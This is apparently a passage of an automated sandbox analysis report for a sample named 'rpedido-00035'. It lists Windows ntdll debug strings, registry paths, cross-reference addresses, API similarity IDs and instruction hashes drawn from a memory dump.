                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                          • API String ID: 0-861424205
                                                          Strings
                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 36087F8C, 36088000
                                                          • LdrpInitializeProcess, xrefs: 3604C5E4
                                                          • Loading import redirection DLL: '%wZ', xrefs: 36087F7B
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 3604C5E3
                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 36087FF0
                                                          • LdrpInitializeImportRedirection, xrefs: 36087F82, 36087FF6
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                          • API String ID: 0-475462383
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-4253913091
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                          • API String ID: 3446177414-2283098728
                                                          Strings
                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 360880E9
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 360880F3
                                                          • Failed to reallocate the system dirs string !, xrefs: 360880E2
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 3446177414-1783798831
                                                          Strings
                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 36094519
                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 36094508
                                                          • LdrpCheckRedirection, xrefs: 3609450F
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                          • API String ID: 3446177414-3154609507
                                                          Strings
                                                          • Kernel-MUI-Language-Allowed, xrefs: 3603519B
                                                          • Kernel-MUI-Number-Allowed, xrefs: 36035167
                                                          • Kernel-MUI-Language-SKU, xrefs: 3603534B
                                                          • WindowsExcludedProcs, xrefs: 3603514A
                                                          • Kernel-MUI-Language-Disallowed, xrefs: 36035272
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                          • API String ID: 0-258546922
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          Similarity
                                                          • API ID:
                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                          • API String ID: 0-3061284088
                                                          Strings
                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 36010586
                                                          • kLsE, xrefs: 360105FE
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                          • API String ID: 3446177414-2547482624
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                          • API String ID: 0-379654539
                                                          Strings
                                                          • @, xrefs: 360484B1
                                                          • LdrpInitializeProcess, xrefs: 36048342
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 36048341
                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 3604847E
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-1918872054
                                                          Strings
                                                          • SXS: %s() passed the empty activation context, xrefs: 36081FE8
                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 36081FE3, 360820BB
                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 360820C0
                                                          • .Local, xrefs: 360427F8
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                          • API String ID: 0-1239276146
                                                          Strings
                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 36070DEC
                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 36070E72
                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 36070EB5
                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 36070E2F
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                          • API String ID: 0-1468400865
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                          • API String ID: 0-2586055223
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                          • API String ID: 2994545307-1391187441
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                          • API String ID: 0-1168191160
                                                          Strings
                                                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 36011648
                                                          • HEAP: , xrefs: 360114B6
                                                          • HEAP[%wZ]: , xrefs: 36011632
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                          • API String ID: 0-3178619729
                                                          Strings
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 360800C7
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 360800F1
                                                          • RTL: Re-Waiting, xrefs: 36080128
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                          • API String ID: 0-2474120054
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                          • API String ID: 0-1145731471
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                          • API String ID: 0-2391371766
                                                          Strings
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                          • API String ID: 0-318774311
                                                          Strings
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                          • API String ID: 0-373624363
                                                          Strings
                                                          • TargetNtPath, xrefs: 360EB3AF
                                                          • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 360EB3AA
                                                          • GlobalizationUserSettings, xrefs: 360EB3B4
                                                          Similarity
                                                          • API ID:
                                                          • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                          • API String ID: 0-505981995
                                                          Strings
                                                          • HEAP: , xrefs: 3606E442
                                                          • HEAP[%wZ]: , xrefs: 3606E435
                                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3606E455
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                          • API String ID: 0-1340214556
                                                          Strings
                                                          • minkernel\ntdll\ldrmap.c, xrefs: 3607A3A7
                                                          • LdrpCompleteMapModule, xrefs: 3607A39D
                                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 3607A396
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                          • API String ID: 0-1676968949
                                                          Strings
                                                          • HEAP: , xrefs: 360BD79F
                                                          • HEAP[%wZ]: , xrefs: 360BD792
                                                          • Heap block at %p modified at %p past requested size of %Ix, xrefs: 360BD7B2
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                          • API String ID: 0-3815128232
                                                          Strings
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                          • API String ID: 0-1151232445
                                                          Strings
                                                          • minkernel\ntdll\ldrtls.c, xrefs: 36081954
                                                          • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 36081943
                                                          • LdrpAllocateTls, xrefs: 3608194A
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                          • API String ID: 0-4274184382
                                                          Strings
                                                          • RtlCreateActivationContext, xrefs: 36082803
                                                          • Actx , xrefs: 360432CC
                                                          • SXS: %s() passed the empty activation context data, xrefs: 36082808
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                          • API String ID: 0-859632880
                                                          Strings
                                                          • GlobalFlag, xrefs: 3609B30F
                                                          • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3609B2B2
                                                          • @, xrefs: 3609B2F0
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                          • API String ID: 0-4192008846
                                                          Strings
                                                          • LdrpInitializeTls, xrefs: 36081851
                                                          • minkernel\ntdll\ldrtls.c, xrefs: 3608185B
                                                          • DLL "%wZ" has TLS information at %p, xrefs: 3608184A
                                                          Similarity
                                                          • API ID:
                                                          • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                          • API String ID: 0-931879808
                                                          Strings
                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 360985DE
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                          • API String ID: 0-702105204
                                                          APIs
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          Strings
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Legacy$UEFI
                                                          • API String ID: 0-634100481
                                                          Strings
                                                          • RedirectedKey, xrefs: 360EB60E
                                                          • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 360EB5C4
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                          • API String ID: 0-1388552009
                                                          Strings
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: $$$
                                                          • API String ID: 3446177414-233714265
                                                          Strings
                                                          • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3608289F
                                                          • RtlpInitializeAssemblyStorageMap, xrefs: 3608289A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                          • API String ID: 0-2653619699
                                                          • Opcode ID: 694766b38984b587824d31e66ab5613cc7188f057adc9994dd0982ef0290b99c
                                                          • Instruction ID: a2fec4295ec21b8d33fec2d91b13a9853dfc0519315508fb690f985bc0eafe09
                                                          • Opcode Fuzzy Hash: 694766b38984b587824d31e66ab5613cc7188f057adc9994dd0982ef0290b99c
                                                          • Instruction Fuzzy Hash: 16113A72F05214FBFB2A9A5ACD42F9A7EE9DB84744F5080B9B9009B240DA75DD40C6E4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Cleanup Group$Threadpool!
                                                          • API String ID: 0-4008356553
                                                          • Opcode ID: b33996a69f7607fb7ef285283b7a90734e9c408212ed3033fd9fd35203f0d6eb
                                                          • Instruction ID: 8bc95205c904d53b8bed1bcbdd0cb04ae566489b8ca42a5de8e7f05de0390696
                                                          • Opcode Fuzzy Hash: b33996a69f7607fb7ef285283b7a90734e9c408212ed3033fd9fd35203f0d6eb
                                                          • Instruction Fuzzy Hash: 2001F4B2114740AFE322EF14CE06B267BE8EB40715F0189B9E65CD7590EB74D924CF96
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: MUI
                                                          • API String ID: 0-1339004836
                                                          • Opcode ID: 49b01aeaab85c2eeb3e9ab9944df450f8096c8a22a632436fa356d9f397a8d3f
                                                          • Instruction ID: ddc4b5a6a307d4d5a62e031e0d31a567cf04e93f0c8cc1a2c523eae7d436ca59
                                                          • Opcode Fuzzy Hash: 49b01aeaab85c2eeb3e9ab9944df450f8096c8a22a632436fa356d9f397a8d3f
                                                          • Instruction Fuzzy Hash: 33826DB9E003189FEB15CFA9C98279DBBB1FF49354F5081A9D819AB290DB34DD81CB50
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 04e53382f6fc97714f330a61a7bd0e0c09bc9213ce254b4ce3fc8bb6c1c816aa
                                                          • Instruction ID: 1d04ac535b3cdc762d5578c5f811811611192a635bd4091a0b037619b2ae8c3c
                                                          • Opcode Fuzzy Hash: 04e53382f6fc97714f330a61a7bd0e0c09bc9213ce254b4ce3fc8bb6c1c816aa
                                                          • Instruction Fuzzy Hash: 59E1AD78A183418FD304CF28C991A1EBFE1FF89348F158AADE48587351DB71E955CB92
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 123d767d9b373db50c366498b7463d118389e9370674acf6c7d6b5c045b50b97
                                                          • Instruction ID: 488c37db46916306006b88dc6430c3455fd86ef0ceafbc139f52eaf63aad373d
                                                          • Opcode Fuzzy Hash: 123d767d9b373db50c366498b7463d118389e9370674acf6c7d6b5c045b50b97
                                                          • Instruction Fuzzy Hash: 89A11471E01324AFEB11CBA5C946B9E7FE4AF04798F2102D6EA20AB2D0D7749D44CBD5
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 02292323f184b1c8e99c47de4f16e57ea3fa63eb70888eec7be4c1b473c1391b
                                                          • Instruction ID: a96890dcdccc9fd536229eae4dcad0b30bb4b3dbdcad71f6ed4ff504c1c760fe
                                                          • Opcode Fuzzy Hash: 02292323f184b1c8e99c47de4f16e57ea3fa63eb70888eec7be4c1b473c1391b
                                                          • Instruction Fuzzy Hash: 19B103B59093818FD354CF29C581A5AFFE2FF88308F5449AEE89987351D771E845CB82
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fc8fc7d7ac78dee871673419bafb960c32ed3ba7ca758127a046b664d774a60a
                                                          • Instruction ID: 0f4491f740dd7d9ae339048c83d82a3b64de3b8769c2142668dbaeafcda9c0a9
                                                          • Opcode Fuzzy Hash: fc8fc7d7ac78dee871673419bafb960c32ed3ba7ca758127a046b664d774a60a
                                                          • Instruction Fuzzy Hash: BD615079E00606AFEB08CF68C985A9DFFB5FF48344F2481AAD519A7340DB30A9558BD0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 9af322529dee9ffaecf9a332ab1a81b048b29bd8baea38da73e8364fcea7fe3e
                                                          • Instruction ID: 2ef22fda4bac3f0c43e0a7513b5e5f7f5cac8d53d0772328d52a9e50fb41c398
                                                          • Opcode Fuzzy Hash: 9af322529dee9ffaecf9a332ab1a81b048b29bd8baea38da73e8364fcea7fe3e
                                                          • Instruction Fuzzy Hash: 1D418E79911704CFD715CF24DA52A49BBF2FF45358F2185DAC1069B2A4DB30AAC1CF85
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 1fd64bed7c341928e8d3bb883ef013f4537eda70f15fcca25946dfa03cde3c20
                                                          • Instruction ID: 90141c528da38bba7313ccce45ac4c4d4f4ca127c9b980d3dfe6278db0a0ec15
                                                          • Opcode Fuzzy Hash: 1fd64bed7c341928e8d3bb883ef013f4537eda70f15fcca25946dfa03cde3c20
                                                          • Instruction Fuzzy Hash: 6541C178A103818FD715CF29C995B2EBFE6EF81764F1044ADE541872A0DBB0D855CBE1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 703f03a34cfd887182b88692ff0567160182f289deed3d659f85a75487fc3347
                                                          • Instruction ID: fab77f46fd35bae69eb4f83fd9e814931ae3626921e93e4fb824f12138c35ccf
                                                          • Opcode Fuzzy Hash: 703f03a34cfd887182b88692ff0567160182f289deed3d659f85a75487fc3347
                                                          • Instruction Fuzzy Hash: B0310276900208AFE711CF14C881A5A7BB5EF45368F1042E9ED055B291CB32EE42CFD0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 73adc336d40eb18013343c738eaaa2f7ebb5dd676675cee82abf3f6c241b7ff1
                                                          • Instruction ID: ea36b9b310b51c02885e549145827927e377c5f285745b6e3993c31d650c6caf
                                                          • Opcode Fuzzy Hash: 73adc336d40eb18013343c738eaaa2f7ebb5dd676675cee82abf3f6c241b7ff1
                                                          • Instruction Fuzzy Hash: 6C31EF79B21A11FFE7468B60DE92A49BFA5FF84254F509096E8018BB50CB30F870CB81
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 46fc58e1a9d766104b93235ea6497257ef12a85f9abe1eb8b9e0227104eeb7df
                                                          • Instruction ID: 63156629b6ca46ce04336c2b828f3f8a424f861c05f3fd8bdde43cb0f6b99731
                                                          • Opcode Fuzzy Hash: 46fc58e1a9d766104b93235ea6497257ef12a85f9abe1eb8b9e0227104eeb7df
                                                          • Instruction Fuzzy Hash: 833176B59153028FCB04CF19C54194ABFF1FF89294F148AEEE4889B241D770E949CF92
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 8692e1b959d434ab1f332d92ff18a47503b1ebe2155cee58bbc959585ee052f5
                                                          • Instruction ID: 0b365c40f7398182c19abab8b5246649a3012cfd343e5c6ff26010f5ff9af109
                                                          • Opcode Fuzzy Hash: 8692e1b959d434ab1f332d92ff18a47503b1ebe2155cee58bbc959585ee052f5
                                                          • Instruction Fuzzy Hash: 97210139A116089FEB25DF65CA46B1ABFE1FF80B60F5145D9E8420B644CB74E848CBD2
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: a1955d2e9f783080111b7b283a120cbe1d55e09811be2fcb7f5e8ce0489800f1
                                                          • Instruction ID: 8d6021ca17bf028b05dd7a1e80dfc06766f223410086a5c5ed73d68a49b31f20
                                                          • Opcode Fuzzy Hash: a1955d2e9f783080111b7b283a120cbe1d55e09811be2fcb7f5e8ce0489800f1
                                                          • Instruction Fuzzy Hash: 6FF09A32200644AFE7319B59CD06F9ABBFDEF84B10F1405A9A68693591D6A1E909CA60
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: GlobalTags
                                                          • API String ID: 0-1106856819
                                                          • Opcode ID: 3ac89f4228ed852cbe24fdb0276463dde6b3b3e660951a1eaf9634674ede6c9b
                                                          • Instruction ID: ea2c9c9c83de58a1fc9aaa98d59887bbe960e369291a36a20783726b90562354
                                                          • Opcode Fuzzy Hash: 3ac89f4228ed852cbe24fdb0276463dde6b3b3e660951a1eaf9634674ede6c9b
                                                          • Instruction Fuzzy Hash: 0671ADB8E103199FEF14CF99C98269DBFF2BF48354F2180AAE405B7245EB718961CB50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
